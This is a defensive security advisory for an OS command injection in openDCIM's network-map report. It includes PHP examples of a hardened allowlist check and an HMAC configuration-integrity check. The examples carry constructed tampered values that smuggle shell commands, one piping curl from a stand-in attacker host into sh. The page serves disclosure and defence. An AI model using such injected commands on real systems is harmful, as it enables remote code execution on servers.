Cyber Resilience

CVE-2026-28517

Critical · Public PoC · RCE

Published: 27 February 2026
Modified: 12 May 2026
KEV Added: not listed
Patch: available (pull request 1664)
CVSS v4.0 base score: 9.3 (Critical)
CVSS vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
EPSS score: 0.0565 (92.0th percentile)
Risk Priority: 70 (floored blend, peak EPSS)

Summary

CVE-2026-28517 is a critical-severity OS Command Injection (CWE-78) vulnerability in openDCIM (vendor: Opendcim, product: Opendcim). Its CVSS v4.0 base score is 9.3 (Critical).

Operationally, exploitation aligns with the MITRE ATT&CK technique Exploit Public-Facing Application (T1190); ranked in the top 8.0% of CVEs by exploit likelihood; it is not currently listed in the CISA KEV catalog; a public proof-of-concept is referenced.

The strongest mitigations our analysis identified are NIST 800-53 AC-3 (Access Enforcement) and SI-10 (Information Input Validation).

Deeper analysis

openDCIM version 23.04 through commit 4467e9c4 contains an OS command injection vulnerability in report_network_map.php. The application retrieves the dot configuration parameter from the database and passes it directly to an exec() call without validation or sanitization, allowing arbitrary operating system commands to run if the fac_Config.dot value is altered. The flaw is tracked as CWE-78 and carries a CVSS 4.0 score of 9.3.

An attacker able to modify the fac_Config.dot database entry can execute arbitrary commands in the context of the web server process. The CVSS vector rates the issue as reachable over the network with no privileges and no user interaction, which presumes a path to write that row: on its own, the exec() call is only reachable by whoever can change the configuration table. Any vector that grants that write, such as the separate SQL injection chained in the referenced write-up, or direct access to the database, turns the flaw into remote code execution.
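The pattern described above, reduced to a minimal PHP reproduction beside a hardened form. This is an added example, not openDCIM's code or the fix in pull request 1664; the function names, the shape of the fac_Config row, the command-line flags and the allowlist paths are assumptions for illustration. The tampered value is constructed. The point it makes is that escaping alone does not close the hole, because the stored value chooses the executable itself, so the hardened version restricts it to an allowlist of known binaries and only then escapes the arguments.

```php
<?php
// Added example (not openDCIM's code). Models the advisory's pattern: the
// "dot" value is read from fac_Config and concatenated straight into exec().
// Table/column layout, helper names and paths are assumptions for illustration.

declare(strict_types=1);

// Constructed fac_Config contents as an attacker could leave them after a
// separate write primitive (e.g. the SQL injection chained in the write-up).
$fac_Config = [
    'dot' => '/usr/bin/dot; id > /tmp/pwned #',   // tampered value
];

// Vulnerable shape: the stored string is trusted and reaches the shell verbatim.
// Defined for comparison only; it is never called in this script.
function renderMapVulnerable(array $config, string $dotFile, string $pngFile): string
{
    $cmd = $config['dot'] . ' -Tpng ' . $dotFile . ' -o ' . $pngFile;
    exec($cmd, $out, $rc);              // "; id > /tmp/pwned" runs as the web user
    return $cmd;
}

// Hardened shape: the stored value may only select one of a fixed set of known
// binaries, and every argument is escaped before the shell sees it.
const DOT_ALLOWLIST = ['/usr/bin/dot', '/usr/local/bin/dot'];   // assumption

function resolveDotBinary(string $configured): string
{
    // Reject anything that is not a plain absolute path: no spaces, quotes,
    // separators or other shell metacharacters.
    if (!preg_match('#\A/[A-Za-z0-9_./-]+\z#', $configured)) {
        throw new InvalidArgumentException('fac_Config.dot is not a plain absolute path');
    }
    // realpath() collapses "../" and symlinks so the allowlist compares real files.
    $real = realpath($configured);
    if ($real === false || !in_array($real, DOT_ALLOWLIST, true) || !is_executable($real)) {
        throw new InvalidArgumentException('fac_Config.dot does not point at an approved dot binary');
    }
    return $real;
}

function renderMapHardened(array $config, string $dotFile, string $pngFile): string
{
    $bin = resolveDotBinary($config['dot']);
    $cmd = escapeshellarg($bin) . ' -Tpng ' . escapeshellarg($dotFile)
         . ' -o ' . escapeshellarg($pngFile);
    exec($cmd, $out, $rc);
    if ($rc !== 0) {
        throw new RuntimeException("dot exited with status $rc");
    }
    return $cmd;
}

// Demonstration: the tampered value is rejected before any shell is spawned.
// (With an approved value, realpath() also requires dot to actually be installed.)
try {
    renderMapHardened($fac_Config, '/tmp/map.dot', '/tmp/map.png');
} catch (InvalidArgumentException $e) {
    echo 'blocked: ', $e->getMessage(), PHP_EOL;
}
```

Run it with `php example.php`; it prints the "blocked:" line and never spawns a shell. Note the order of checks: the regex runs before realpath() so that the rejection message never depends on filesystem state, and the allowlist comparison uses the resolved path so that a symlink planted elsewhere cannot satisfy it.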

Public references include a detailed write-up on chaining SQL injection to achieve RCE, a functional exploit repository, the vulnerable code locations in report_network_map.php, and pull request 1664 that addresses the issue. This analysis recorded an EPSS score of 0.3137 with no material rise from a lower baseline; the header above shows the current score of 0.0565 (92.0th percentile).


Vulnerability details

openDCIM version 23.04, through commit 4467e9c4, contains an OS command injection vulnerability in report_network_map.php. The application retrieves the 'dot' configuration parameter from the database and passes it directly to exec() without validation or sanitization. If an attacker can modify the fac_Config.dot value, arbitrary commands may be executed in the context of the web server process.

CWE(s)

CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

Related Threats

MITRE ATT&CK Enterprise Techniques (AI-assisted mapping)

T1190 Exploit Public-Facing Application (Initial Access)
Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network.
T1059.004 Unix Shell (Execution)
Adversaries may abuse Unix shell commands and scripts for execution.
Why these techniques?

The vulnerability is an OS command injection in a public-facing web application (openDCIM). Chained with a write primitive against fac_Config.dot, such as the separate SQL injection in the referenced write-up, it yields unauthenticated remote code execution, which is T1190 (Exploit Public-Facing Application). The payload runs as shell commands through PHP exec(), mapping to T1059.004 (Unix Shell).

Confidence: HIGH · MITRE ATT&CK Enterprise v19.0

CVEs Like This One

CVE-2026-28516 · Same product: Opendcim Opendcim
CVE-2026-28515 · Same product: Opendcim Opendcim
CVE-2018-25115 · Shared CWE-78
CVE-2025-24382 · Shared CWE-78
CVE-2026-29058 · Shared CWE-78
CVE-2024-57016 · Shared CWE-78
CVE-2024-46484 · Shared CWE-78
CVE-2015-10145 · Shared CWE-78
CVE-2020-37002 · Shared CWE-78
CVE-2026-27848 · Shared CWE-78

Affected Assets

Vendor: opendcim · Product: opendcim · Version: 23.04 (through commit 4467e9c4)

Mitigating Controls (NIST 800-53 r5, AI-assisted mapping)

prevent · SI-10 (Information Input Validation)

Requires validation and sanitization of all inputs, including database-sourced configuration values, before they are used in system calls such as exec(). Note that escaping alone is not sufficient here, because the stored value selects the executable itself; the value must be constrained to a known-good binary.

prevent · AC-3 (Access Enforcement)

Enforces access-control policy on the configuration table so that only authorized subjects may modify fac_Config.dot, blocking the prerequisite write needed for command injection. This control is only as strong as the application's database layer: a SQL injection elsewhere in the application bypasses it, which is the chain the referenced write-up uses.

detect

Mandates integrity verification of configuration data, enabling detection of unauthorized changes to fac_Config.dot that would enable the OS command injection. The integrity reference must be stored outside the database, since an attacker with a database write primitive can rewrite both the value and any baseline kept beside it.
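One concrete form of the "detect" control above, as an added example that is not part of this page or of openDCIM: a check that keeps an HMAC baseline of the configuration values that reach exec() and flags any row that no longer matches. The fac_Config column names (Parameter, Value), the list of shell-reaching keys and the sample rows are assumptions constructed for illustration; the HMAC key is a placeholder. The design point is that the baseline is keyed with a secret held outside the database, so an attacker with only a database write primitive cannot forge a matching baseline for a tampered value.

```php
<?php
// Added example (not openDCIM's code): integrity check for configuration
// rows whose values reach a shell. Schema, key names and rows are assumptions.

declare(strict_types=1);

// Keys whose values end up in exec()/shell calls. "dot" is the one the
// advisory names; the list itself is an assumption, extend it per deployment.
const SHELL_REACHING_KEYS = ['dot'];

// Turn a "SELECT Parameter, Value FROM fac_Config" result set into a map.
function rowsToMap(array $resultSet): array
{
    $map = [];
    foreach ($resultSet as $row) {
        $map[$row['Parameter']] = $row['Value'];
    }
    return $map;
}

// Build an HMAC baseline over the approved values. The key must live outside
// the database (e.g. a root-only file); if it sat in the same database, an
// attacker with a write primitive would rewrite the value and its baseline.
function buildBaseline(array $rows, string $hmacKey): array
{
    $baseline = [];
    foreach (SHELL_REACHING_KEYS as $key) {
        if (!array_key_exists($key, $rows)) {
            continue;
        }
        // Bind the key name into the MAC so a value cannot be replayed under another key.
        $baseline[$key] = hash_hmac('sha256', $key . "\0" . $rows[$key], $hmacKey);
    }
    return $baseline;
}

// Compare live rows against the baseline; returns one finding per deviation.
function auditConfig(array $rows, array $baseline, string $hmacKey): array
{
    $findings = [];
    foreach (SHELL_REACHING_KEYS as $key) {
        if (!isset($baseline[$key])) {
            $findings[] = "$key: no baseline recorded";
            continue;
        }
        if (!array_key_exists($key, $rows)) {
            $findings[] = "$key: row missing from fac_Config";
            continue;
        }
        $mac = hash_hmac('sha256', $key . "\0" . $rows[$key], $hmacKey);
        if (!hash_equals($baseline[$key], $mac)) {      // constant-time compare
            $findings[] = "$key: value changed since baseline: " . $rows[$key];
        }
    }
    return $findings;
}

// Constructed sample: rows as approved, then as left after a tampering write.
$hmacKey  = 'placeholder-read-this-from-a-root-only-file';
$approved = rowsToMap([['Parameter' => 'dot', 'Value' => '/usr/bin/dot']]);
$baseline = buildBaseline($approved, $hmacKey);

$live = rowsToMap([
    ['Parameter' => 'dot', 'Value' => '/usr/bin/dot; curl http://attacker.example/x | sh'],
]);
foreach (auditConfig($live, $baseline, $hmacKey) as $finding) {
    echo 'ALERT ', $finding, PHP_EOL;
}
```

In a deployment the constructed arrays are replaced by a PDO query over fac_Config run from cron, with the baseline regenerated only through a change-control step that an application-layer SQL injection cannot reach. An alert from this check is a strong signal that the prerequisite write for CVE-2026-28517 has already happened, so it should be treated as an incident, not a configuration drift ticket.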
